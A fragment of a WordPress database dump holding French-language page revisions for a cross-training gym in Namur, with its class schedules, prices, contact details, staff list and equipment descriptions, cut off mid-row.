(212, 1, '2013-07-03 18:22:23', '2013-07-03 18:22:23', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Les séances sont composées de différentes phases décrites selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<p></p>\r\n<p></p>\r\n<p></p>\r\n<h2>Duo Training :</h2>\r\nUniquement sur rdv\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<p></p>\r\n<p></p>\r\n<p></p>\r\n<h2>Personal Training :</h2>\r\nUniquement sur rdv\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<p></p>\r\n<p></p>\r\n<p></p>\r\n<h2>Coatching nutritionnel :</h2>\r\nUniquement sur rdv\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2></h2>\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 18:22:23', '2013-07-03 18:22:23', '', 11, 'http://www.crosstrainingcenter.be/?p=212', 0, 'revision', '', 0),
(218, 2, '2013-09-17 20:26:02', '2013-09-17 20:26:02', '<h2>Prix</h2>\n<table>\n<tbody>\n<tr>\n<td class=\"ttitrehprix\">Team Training (réservation obligatoire)</td>\n<td class=\"tcelluleprix\">1 séance : 9.00€\n1 carte de 10 séances : 80.00€ (valable 3 mois)\n1 carte de 20 séances : 120.00€ (valable 4 mois)\nAbonnement 6 mois illimité : 399.00€</td>\n</tr>\n<tr>\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\n</tr>\n<tr>\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\nSuivi 15,00€</td>\n</tr>\n</tbody>\n</table>', 'Prix', '', 'inherit', 'open', 'open', '', '214-autosave', '', '', '2013-09-17 20:26:02', '2013-09-17 20:26:02', '', 214, 'http://www.crosstrainingcenter.be/?p=218', 0, 'revision', '', 0),
(214, 1, '2013-07-03 18:25:11', '2013-07-03 18:25:11', '<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training (réservation obligatoire)</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Prix', '', 'publish', 'closed', 'open', '', 'prix', '', '', '2013-11-03 10:12:44', '2013-11-03 10:12:44', '', 0, 'http://www.crosstrainingcenter.be/?page_id=214', 0, 'page', '', 0),
(215, 1, '2013-07-03 18:25:05', '2013-07-03 18:25:05', '', 'Prix', '', 'inherit', 'open', 'open', '', '214-revision', '', '', '2013-07-03 18:25:05', '2013-07-03 18:25:05', '', 214, 'http://www.crosstrainingcenter.be/?p=215', 0, 'revision', '', 0),
(232, 1, '2013-07-03 19:31:30', '2013-07-03 19:31:30', '', 'bertrand_bauwin-pti', '', 'inherit', 'open', 'open', '', 'bertrand_bauwin-pti', '', '', '2013-07-03 19:31:30', '2013-07-03 19:31:30', '', 20, 'http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg', 0, 'attachment', 'image/jpeg', 0),
(217, 1, '2013-07-03 18:23:56', '2013-07-03 18:23:56', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Les séances sont composées de différentes phases décrites selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>_</h2>\r\n<h2>Duo Training :</h2>\r\nUniquement sur rdv\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>_</h2>\r\n<h2>Personal Training :</h2>\r\nUniquement sur rdv\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>_</h2>\r\n<h2>Coatching nutritionnel :</h2>\r\nUniquement sur rdv\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2></h2>\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 18:23:56', '2013-07-03 18:23:56', '', 11, 'http://www.crosstrainingcenter.be/?p=217', 0, 'revision', '', 0),
(220, 1, '2013-06-16 15:15:32', '2013-06-16 15:15:32', '<h1>Prise de RDV :</h1>\r\nPrise de RDV par téléphone : 0485 / 92 . 02 . 12\r\n<h1>Adresse :</h1>\r\nChaussée de Perwez 251\r\n5002 Namur\r\n<a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a>\r\n<h1>Plan d\'accès :</h1>\r\n&nbsp;\r\n<iframe width=\"425\" height=\"350\" frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\" src=\"http://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;sll=50.483687,4.854333&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002+Namur,+R%C3%A9gion+wallonne&amp;ll=50.483687,4.854333&amp;spn=0.046423,0.112867&amp;t=m&amp;z=14&amp;output=embed\"></iframe><br /><small><a href=\"http://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;sll=50.483687,4.854333&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002+Namur,+R%C3%A9gion+wallonne&amp;ll=50.483687,4.854333&amp;spn=0.046423,0.112867&amp;t=m&amp;z=14&amp;source=embed\" style=\"color:#0000FF;text-align:left\">Agrandir le plan</a></small>', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-06-16 15:15:32', '2013-06-16 15:15:32', '', 9, 'http://www.crosstrainingcenter.be/?p=220', 0, 'revision', '', 0),
(221, 1, '2013-06-16 15:08:36', '2013-06-16 15:08:36', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Baptiste Pitsaer</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Anaïs Gosset</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-15', '', '', '2013-06-16 15:08:36', '2013-06-16 15:08:36', '', 20, 'http://www.crosstrainingcenter.be/?p=221', 0, 'revision', '', 0);
INSERT INTO `www_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(222, 1, '2013-06-16 13:47:21', '2013-06-16 13:47:21', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …).\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\"><img class=\"alignnone size-full wp-image-68\" alt=\"trx1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>TRX Suspension Training</h1>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\"><img class=\"alignnone size-full wp-image-70\" alt=\"kb\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Kettlebel</h1>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg\"><img class=\"alignnone size-full wp-image-72\" alt=\"vipr-f1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>ViPR</h1>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/ript.jpg\"><img class=\"alignnone size-full wp-image-75\" alt=\"ript\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/ript.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>RIP Trainer</h1>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 13:47:21', '2013-06-16 13:47:21', '', 22, 'http://www.crosstrainingcenter.be/?p=222', 0, 'revision', '', 0),
(223, 1, '2013-07-03 19:02:56', '2013-07-03 19:02:56', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Les séances sont composées de différentes phases décrites selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td 